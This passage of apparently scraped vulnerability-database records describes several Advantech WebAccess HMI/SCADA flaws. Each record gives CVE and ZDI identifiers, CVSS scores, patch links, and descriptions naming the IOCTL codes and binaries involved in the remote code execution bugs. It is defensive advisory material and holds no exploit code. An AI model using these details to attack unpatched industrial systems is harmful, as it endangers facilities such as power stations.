) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13881 IOCTL in the BwOpcTool subsystem. An uncontrolled format string vulnerability exists in a call to sprintf. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0851" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88361" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0851", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-324", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00428", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001072", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3173", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-052", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D581EC-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88361", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "VULHUB", "id": "VHN-88361" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "id": "VAR-201601-0033", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "VULHUB", "id": "VHN-88361" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00428" } ] }, "last_update_date": "2024-11-23T21:43:23.402000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Advantech WebAccess denial of service vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70373" }, { "title": "Advantech WebAccess Buffer Overflow Vulnerability Fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59642" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88361" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.5, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0851" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0851" }, { "trust": 0.6, "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0851" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "VULHUB", "id": "VHN-88361" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-052" }, { "db": "CNVD", "id": "CNVD-2016-00428" }, { "db": "VULHUB", "id": "VHN-88361" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "db": "CNNVD", "id": "CNNVD-201601-324" }, { "db": "NVD", "id": "CVE-2016-0851" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-052" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00428" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88361" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-324" }, { "date": "2016-01-15T03:59:13.437000", "db": "NVD", "id": "CVE-2016-0851" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-052" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00428" }, { "date": "2016-01-20T00:00:00", "db": "VULHUB", "id": "VHN-88361" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001072" }, { "date": "2016-01-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-324" }, { "date": "2024-11-21T02:42:30.440000", "db": "NVD", "id": "CVE-2016-0851" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-324" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Denial of service vulnerability", "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00428" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "64d581ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201601-324" } ], "trust": 0.8 } }
var-201903-1778
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within tv_enua.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-19-293", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-293", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within tv_enua.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7909", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-293", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ] }, "id": "VAR-201903-1778", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:04:28.979000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-19-293", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-03-28T00:00:00", "db": "ZDI", "id": "ZDI-19-293", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-03-28T00:00:00", "db": "ZDI", "id": "ZDI-19-293", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess Node tv_enua Improper Access Control Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-293" } ], "trust": 0.7 } }
var-202005-1245
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwscrp.exe when invoked via IOCTL 0x2711. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-20-632", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-20-632", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwscrp.exe when invoked via IOCTL 0x2711. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-10325", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-632", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ] }, "id": "VAR-202005-1245", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:52:29.600000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-20-632", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-632", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-632", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess IOCTL 0x2711 bwscrp Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-20-632" } ], "trust": 0.7 } }
var-202009-0590
Vulnerability from variot
WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges. WebAccess Node Is Advantech Industrial software provided by. Advantech WebAccess Node is an HMI (Human Machine Interaction) platform.
Advantech WebAccess Node versions before 9.0.1 have security vulnerabilities
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202009-0590", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "9.0.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "9.0.1" }, { "model": "webaccess node", "scope": "lt", "trust": 0.6, "vendor": "advantech", "version": "9.0.1" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008765" } ] }, "cve": "CVE-2020-16202", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2020-16202", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CNVD-2020-53796", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "VHN-169257", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2020-16202", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Local", "author": "IPA score", "availabilityImpact": "High", "baseScore": 7.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-008765", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-16202", "trust": 1.0, "value": "HIGH" }, { "author": "IPA", "id": "JVNDB-2020-008765", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-53796", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202009-1042", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-169257", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess Node (All versions prior to 9.0.1) has incorrect permissions set for resources used by specific services, which may allow code execution with system privileges. WebAccess Node Is Advantech Industrial software provided by. Advantech WebAccess Node is an HMI (Human Machine Interaction) platform. \n\r\n\r\nAdvantech WebAccess Node versions before 9.0.1 have security vulnerabilities", "sources": [ { "db": "NVD", "id": "CVE-2020-16202" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ICS CERT", "id": "ICSA-20-261-01", "trust": 3.1 }, { "db": "NVD", "id": "CVE-2020-16202", "trust": 3.1 }, { "db": "JVN", "id": "JVNVU99116422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-008765", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-53796", "trust": 0.7 }, { "db": "NSFOCUS", "id": "49608", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.3217", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202009-1042", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-169257", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "id": "VAR-202009-0590", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" } ], "trust": 1.23993413 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" } ] }, "last_update_date": "2024-11-23T23:04:16.060000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Support \u0026 Download", "trust": 0.8, "url": "https://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-MS9MJV\u0026Doc_Source=Download" }, { "title": "Patch for Advantech WebAccess Node Critical Resource Authority Assignment Incorrect Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/235510" }, { "title": "Advantech WebAccess Node Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=128363" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNNVD", "id": "CNNVD-202009-1042" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-732", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-169257" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-261-01" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16202" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu99116422/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.3217/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16202" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/49608" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-53796" }, { "db": "VULHUB", "id": "VHN-169257" }, { "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "db": "NVD", "id": "CVE-2020-16202" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-09-24T00:00:00", "db": "CNVD", "id": "CNVD-2020-53796" }, { "date": "2020-09-22T00:00:00", "db": "VULHUB", "id": "VHN-169257" }, { "date": "2020-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "date": "2020-09-17T00:00:00", "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "date": "2020-09-22T15:15:14.560000", "db": "NVD", "id": "CVE-2020-16202" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-09-24T00:00:00", "db": "CNVD", "id": "CNVD-2020-53796" }, { "date": "2020-09-30T00:00:00", "db": "VULHUB", "id": "VHN-169257" }, { "date": "2020-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-008765" }, { "date": "2020-10-19T00:00:00", "db": "CNNVD", "id": "CNNVD-202009-1042" }, { "date": "2024-11-21T05:06:55.577000", "db": "NVD", "id": "CVE-2020-16202" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-202009-1042" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech Made WebAccess Node Vulnerability in improper permission assignment for critical resources", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-008765" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-202009-1042" } ], "trust": 0.6 } }
var-201708-1711
Vulnerability from variot
